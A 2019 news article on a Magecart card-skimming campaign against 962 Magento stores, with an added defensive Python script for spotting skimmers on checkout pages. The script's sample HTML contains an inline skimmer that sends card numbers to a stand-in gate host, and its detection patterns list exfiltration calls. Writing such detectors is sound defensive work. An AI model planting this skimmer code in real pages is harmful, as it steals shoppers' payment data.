8 July 2019

A large-scale Magecart campaign hits over 960 e-commerce stores


Security researchers have spotted a new large-scale payment card skimming campaign that has already compromised 962 online stores running the Magento CMS. Sanguine Security researcher Willem de Groot, who uncovered the attacks, believes the cybercriminals behind the campaign automated them in some way, since the card skimming script was added to the stores within a 24-hour window, which would be nearly impossible to do manually in such a short time.

Although Sanguine Security did not share details on how exactly such automated Magecart attacks against e-commerce websites would work, the procedure most likely involved scanning for and exploiting security flaws in the stores' software. De Groot speculates that the threat actors may have compromised sites that were not patched against PHP object injection exploits. The company is still investigating the incident, so at the moment it is unclear how the online stores were hacked, but the researchers have decoded the JavaScript-based payment data skimmer and uploaded it to a GitHub Gist. The skimmer script gathers credit card data, names, phone numbers, and addresses from the compromised websites.

According to de Groot, the list of hacked sites includes victims from around the world, and while most of them are small, several stores belong to large enterprises.

A security researcher known online as Micham discovered another attack attributed to the Magecart group: the hackers injected a malicious skimmer into The Guardian's site via an old AWS S3 bucket, using wix-cloud[.]com as the skimmer gate.
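A defender-side check that follows from the two cases above (a skimmer script added to Magento checkout pages, and a skimmer that loads from an external gate host): the Python example below is added here and is not code from the article, Sanguine Security or the skimmer Gist. It scans a page's HTML for script sources outside a per-store allowlist and for inline scripts that both reference card fields and contain a send primitive. The sample page, the store host and the gate host `skimmer-gate.example` are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page: one script from the store's own host, one from an unknown
# host (stand-in for a skimmer gate), and an inline script that beacons card data out.
SAMPLE_HTML = """<html><head>
<script src="https://static.example-store.test/js/checkout.js"></script>
<script src="https://skimmer-gate.example/s.js"></script>
</head><body><form id="payment-form"><input name="cc_number"><input name="cc_cid"></form>
<script>document.getElementById('payment-form').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=cc_number]').value};
  new Image().src = 'https://skimmer-gate.example/g?d=' + btoa(JSON.stringify(d));
});</script></body></html>"""

ALLOWED_SCRIPT_HOSTS = {"static.example-store.test"}  # assumed allowlist for this store
CARD_FIELDS = re.compile(r"cc_number|cc_cid|cc_exp|card[_-]?number", re.I)
EXFIL_CALLS = re.compile(r"new Image\(\)\.src|XMLHttpRequest|fetch\(|sendBeacon|btoa\(")

class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)       # external script: check its host
            else:
                self._in_script = True          # inline script: capture its body
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def find_skimmer_indicators(html, allowed_hosts):
    """Flag scripts from hosts outside the allowlist and inline scripts that read card fields and send."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            findings.append(("unexpected_script_host", host))
    for body in parser.inline:
        if CARD_FIELDS.search(body) and EXFIL_CALLS.search(body):
            findings.append(("inline_card_exfil", body.strip()[:60]))
    return findings
```

Run it periodically against the live checkout page and diff the findings against the previous run; a new host or a new inline hit is the signal worth paging on.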

Magecart is an umbrella term covering a number of cybercriminal groups that specialize in skimming credit card details from unsecured payment forms on websites. Security firms have been tracking the activities of a dozen Magecart groups since at least 2015. The groups implant skimming scripts into compromised online stores in order to steal payment card data, but they differ considerably from one another, and some use more advanced techniques; Group 4 in particular appears to be more sophisticated.
